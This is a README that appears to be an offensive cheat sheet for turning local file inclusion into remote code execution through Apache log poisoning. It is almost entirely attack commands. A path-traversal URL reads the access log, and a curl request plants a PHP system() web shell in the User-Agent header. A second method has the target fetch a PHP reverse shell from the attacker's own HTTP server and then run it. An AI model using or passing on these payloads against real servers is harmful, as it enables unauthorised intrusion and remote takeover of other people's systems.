RoqueNight/LFI---RCE-Cheat-Sheet/README.md

 ```
 Example URL: http//10.10.10.10/index.php?file=../../../../../../../var/log/apache2/access.log

-// Must have the ability to read the log file

 Payload: curl "http://192.168.8.108/" -H "User-Agent: <?php system(\$_GET['c']); ?>"

-// Replace IP with your target

 Execute RCE: http//10.10.10.10/index.php?file=../../../../../../../var/log/apache2/access.log&c=id

 OR

 python -m SimpleHTTPServer 9000

-// You can use any port

 Payload: curl "http://<remote_ip>/" -H "User-Agent: <?php file_put_contents('shell.php',file_get_contents('http://<local_ip>:9000/shell-php-rev.php')) ?>"

-// This will download the PHP reverse shell from your web server onto the target

 file_put_contents('shell.php')                                // What it will be saved locally on the target
 file_get_contents('http://<local_ip>:9000/shell-php-rev.php') // Where is the shell on YOUR pc and WHAT is it called

 Execute PHP Reverse Shell: http//10.10.10.10/shell.php

 ```

 # LFI to RCE via SSH Log File Poisoning (PHP)